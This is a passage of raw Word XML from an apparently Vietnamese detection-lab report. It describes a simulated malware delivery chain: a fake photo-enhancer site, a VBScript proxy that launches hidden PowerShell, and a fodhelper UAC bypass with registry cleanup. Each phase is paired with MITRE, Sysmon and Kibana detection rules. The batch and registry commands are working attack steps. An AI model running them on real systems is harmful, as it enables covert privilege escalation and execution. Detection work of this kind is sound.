    <w:p w14:paraId="2F45473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payload.ps1  &lt;- WMI installer + exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8D3E2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   setup.hta    &lt;- decoy UI giả mạo cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2675379B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E2F91E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hiệu quả kỹ thuật: RAR encrypted = black box với gateway AV. Browser không cảnh báo file .rar mạnh như .exe. Social engineering qua password display tạo cảm giác phần mềm chuyên nghiệp, giảm nghi ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59645623" w14:textId="77777777" w:rsidR="00A91F30" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91F30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22D0DB41" wp14:editId="6A148B47">
            <wp:extent cx="6120130" cy="2780665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="80262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24303" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2780665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BFCDC" w14:textId="2EC67A35" w:rsidR="00A91F30" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00454EEB">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00504F6A">
        <w:t>Trang web AI Photo Enhancer Pro — landing page giả mạo với before/after demo và nút Download</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11E990" w14:textId="77777777" w:rsidR="00A91F30" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91F30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54939E1B" wp14:editId="6A3FF476">
            <wp:extent cx="6120130" cy="2764790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181243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38254" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2764790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25E909" w14:textId="4BD69F5C" w:rsidR="00A91F30" w:rsidRDefault="00A91F30" w:rsidP="00A91F30">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00454EEB">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00731DE6">
        <w:t>Modal hiển thị file RAR và password sau khi click Download</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16201BBB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2 — Execution (T1059.005): VBScript Proxy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01B4A" w14:paraId="5C37B58B"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68D4A03C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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0140CB1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.005 — Command and Scripting Interpreter: Visual Basic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4DB07676"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603C8E21" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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E2572C4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0002 — Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="15B39A2C"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05BD5B9F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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C709291" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 1 — ProcessCreate (wscript.exe, powershell.exe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2E08486B"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262E4721" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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86B78DB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="63093A2D"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0ECF0911" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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79B7CA3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.name, process.command_line, process.parent.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="63D0C7A1"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7409BCB1" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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498C52B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium — risk_score: 47</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B87507E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7127C5EA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>setup.bat tạo file r.vbs trong %TEMP% sử dụng WScript.Shell.Run() với windowStyle=0 (ẩn hoàn toàn cửa sổ) và tham số False (không chờ). Mục đích: thực thi powershell.exe hoàn toàn ẩn, không flash cửa sổ, không để lại dấu hiệu trực quan cho người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0A18A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA1E49A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:: setup.bat — Tao VBScript proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CBCDFF"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echo Set o=CreateObject("WScript.Shell") &gt; "%TEMP%\r.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA989C"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echo o.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass" ^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD84DF"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&amp; " -File ""%S%payload.ps1""",0,False &gt;&gt; "%TEMP%\r.vbs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF1D9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25AE83F2"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Signal rule S1 bat duoc su kien nay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330891FD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:: process.name=wscript.exe, command_line=*powershell*, *Hidden*, *Bypass*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C990AE3" w14:textId="77777777" w:rsidR="00185594" w:rsidRDefault="00185594" w:rsidP="00185594">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00185594">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FFAF9FF" wp14:editId="6953F220">
            <wp:extent cx="6120130" cy="2360295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="23350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07691" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2360295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD55DCA" w14:textId="68025B0F" w:rsidR="00B01B4A" w:rsidRDefault="00185594" w:rsidP="00185594">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 3: </w:t>
      </w:r>
      <w:r w:rsidRPr="007678E6">
        <w:t>Sysmon EventID 1 ghi nhận wscript.exe spawn powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A49A56E" w14:textId="77777777" w:rsidR="00185594" w:rsidRDefault="00185594" w:rsidP="00185594"/>
    <w:p w14:paraId="7C1D1376" w14:textId="77777777" w:rsidR="00185594" w:rsidRDefault="00185594" w:rsidP="00185594">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00185594">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F98954B" wp14:editId="2DA12306">
            <wp:extent cx="6120130" cy="2550795"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="119514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46953" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2550795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164C68F" w14:textId="2180DE13" w:rsidR="00185594" w:rsidRPr="00185594" w:rsidRDefault="00185594" w:rsidP="00185594">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="008917B9">
        <w:t xml:space="preserve"> Alert S1 — VBScript Proxy xuất hiện trong Kibana SIEM]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B85930" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58460BEB" w14:textId="56442E7D" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 3 — Privilege Escalation (T1548.002): UAC Bypass via Fodhelper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01B4A" w14:paraId="7D25FB49"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12442CFC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique</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C7E87A0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1548.002 — Bypass User Account Control: Fodhelper.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="165EFB13"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35260A85" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Tactic</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F6E527B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>TA0004 — Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="10A538C1"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54D2B8D4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Event ID</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3098E4F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EID 13 (Registry write), EID 1 (fodhelper spawn), EID 1 (shell spawn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="0567C6FE"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2D7F059A" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log Source</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D06B557" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Microsoft-Windows-Sysmon/Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="3C0EEF74"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79499F77" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ECS Field chính</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87783FB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>registry.path, process.name, process.parent.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="5ABF5EFD"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2405029E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mức độ nguy hiểm</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F423A31" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High — risk_score: 73</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AABED0B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540A947C" w14:textId="1FE9603E" w:rsidR="00B01B4A" w:rsidRDefault="00000000" w:rsidP="00671801">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>fodhelper.exe là binary Microsoft-signed với thuộc tính autoElevate=true trong manifest. Windows tự nâng quyền khi fodhelper chạy mà không hiện UAC dialog. Kỹ thuật: ghi đè HKCU registry key ms-settings trỏ đến VBScript proxy, trigger fodhelper, sau 3 giây xóa registry để cản trở forensic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F2188" w14:textId="77777777" w:rsidR="00671801" w:rsidRDefault="00671801" w:rsidP="00671801">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448A5503" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:: setup.bat — UAC Bypass sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC3C78"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46D87C0B"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[3] Xoa registry cu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B9187"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reg delete "HKCU\Software\Classes\ms-settings" /f &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAAD897"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4B43C5B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[4] Ghi registry — wscript proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205B5EF"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reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021563C"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/ve /t REG_SZ /d "wscript.exe \"%TEMP%\r.vbs\"" /f &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F60F6C"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reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBA61A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/v "DelegateExecute" /t REG_SZ /d "" /f &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C400439"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6EEEFB6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[5] Trigger fodhelper — autoElevate=true, khong hien UAC dialog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612EE86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start /b fodhelper.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F964607"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2309647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[6] Cho fodhelper doc registry (3 giay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A610978"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timeout /t 3 /nobreak &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5165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3925CD1C"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[7] Don sach — xoa registry va VBS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3A8109"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reg delete "HKCU\Software\Classes\ms-settings" /f &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31753C9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del /F /Q "%VBS%" &gt;nul 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A34719"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07EB71C9"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Correlation Rule C1 bat sequence nay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78EE7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EID 13 (ms-settings write) -&gt; EID 1 (fodhelper) -&gt; EID 1 (wscript/powershell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061C2F2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:: maxspan=30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318084DF" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A763960" w14:textId="21EABCA9" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Điểm then chốt của detection: sequence registry write ms-settings → fodhelper spawn → shell interpreter. ms-settings là invariant của technique này — không thể bypass mà không ghi vào key này nếu vẫn dùng fodhelper. Sau 3 giây cleanup, </w:t>
      </w:r>
      <w:r w:rsidR="002F741A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cửa sổ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> phát hiện bằng forensics là cực hẹp, nhưng Sysmon đã ghi nhận EventID 13 ngay tại thời điểm registry write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256ADF4" w14:textId="77777777" w:rsidR="00003020" w:rsidRDefault="00003020" w:rsidP="00003020">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00003020">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC97346" wp14:editId="50A30BEB">
            <wp:extent cx="6120130" cy="3487420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153839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91369" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3487420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="419578A9" w14:textId="7F6FD26B" w:rsidR="00003020" w:rsidRDefault="00003020" w:rsidP="00003020">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 4: </w:t>
      </w:r>
      <w:r w:rsidRPr="00764EF8">
        <w:t>Sysmon EventID 13 ghi nhận registry write vào ms-settings (trước khi cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001AD5C" w14:textId="77777777" w:rsidR="00003020" w:rsidRDefault="00003020" w:rsidP="00003020"/>
    <w:p w14:paraId="163348E8" w14:textId="77777777" w:rsidR="00003020" w:rsidRDefault="00003020" w:rsidP="00003020">
